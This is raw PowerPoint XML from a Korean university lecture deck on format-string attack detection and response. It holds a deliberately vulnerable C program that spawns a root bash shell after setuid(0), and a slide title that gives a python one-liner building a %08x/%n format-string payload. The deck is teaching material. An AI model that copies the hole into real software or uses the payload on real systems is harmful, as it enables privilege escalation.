              <a:t> [1]); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "pass @% # 8x, [% d] [% # 8x] \ n", &amp; pass, pass, pass); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>strncmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff) -1) == 0) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Correct Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            pass = 144; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     else { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Wrong Password \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (pass == 144) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     / * Now give root or admin rights to user * / </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "\ n Root privileges given to the user \ n"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (0); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>          system ( "/ bin / bash"); </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      return 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933773" y="2091291"/>
            <a:ext cx="1853392" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> () { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      return "root123"; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5883353" y="1777987"/>
            <a:ext cx="1989647" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The source of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933772" y="5407213"/>
            <a:ext cx="5354171" cy="1139752"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>Check the vulnerable code of the source file, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>For this, we first look at the secure (safe) code in the next slide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196550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이온">
  <a:themeElements>
    <a:clrScheme name="이온">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이온">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이온">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이온">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6689</TotalTime>
  <Words>4105</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>461</Paragraphs>
  <Slides>24</Slides>
  <Notes>19</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24</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="32" baseType="lpstr">
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>굴림</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>이온</vt:lpstr>
      <vt:lpstr>CYBER AEGIS for Handong Global Univ. #81. FormatString Attack Detection and Response</vt:lpstr>
      <vt:lpstr>CYBER AEGIS for Handong Global Univ. #81. FormatString Attack Detection and Response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What is the use of the %n format specifier in C?  Nothing printed.  The argument must be a pointer to a signed int, where the number of characters written so far is stored.  #include &lt;stdio.h&gt;                                                                &lt;output&gt;                                                                                                 blah  blah int main()                                                                               val = 5 {   int val;    printf("blah %n blah\n", &amp;val);    printf("val = %d\n", val);    return 0;  }  </vt:lpstr>
      <vt:lpstr>Call Stack Sequence   call stack is a stack data structure that stores information  about the active subroutines of a computer program.  </vt:lpstr>
      <vt:lpstr>Python print  python –c ‘print “\xd0\xeb\xff\xbf”+”%08x%08x%08x%08x%08x%08x%08x%08x%08x%n”’     d0 eb ff bf   %  0  8  x    %  0  8  x     %  0  8  x     %  0  8  x    %  0  8  x    %  0  8  x     %  0  8  x     %  0  8  x     %  0  8  x    %  n          \x \x \x \x  c  c  c  c   c  c  c  c     c  c  c  c    c  c  c  c   c  c  c  c    c  c  c  c    c  c  c  c    c  c  c  c    c  c  c  c    c  c </vt:lpstr>
      <vt:lpstr>Printf formatstring and arguments      #include &lt;stdio.h&gt;                                             &lt;output&gt;                                                                                   10 20 0     int main()                                                               10 20 0 4005c8     {             int a = 10;             int b = 20;             printf(“%d %d %d\n”, a, b);             printf(“%d %d %d %x\n”, a, b);            return 0;    }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정보보호 전공</Manager>
  <Company>서울여대 정보통신공학부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현대암호학 응용 및 실습 강의 교재</dc:title>
  <dc:creator>김윤정 교수</dc:creator>
  <cp:lastModifiedBy>우리집</cp:lastModifiedBy>
  <cp:revision>308</cp:revision>
  <cp:lastPrinted>2020-07-06T06:43:02Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-09-04T05:54:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-19T15:18:44Z</dcterms:modified>
</cp:coreProperties>
</file>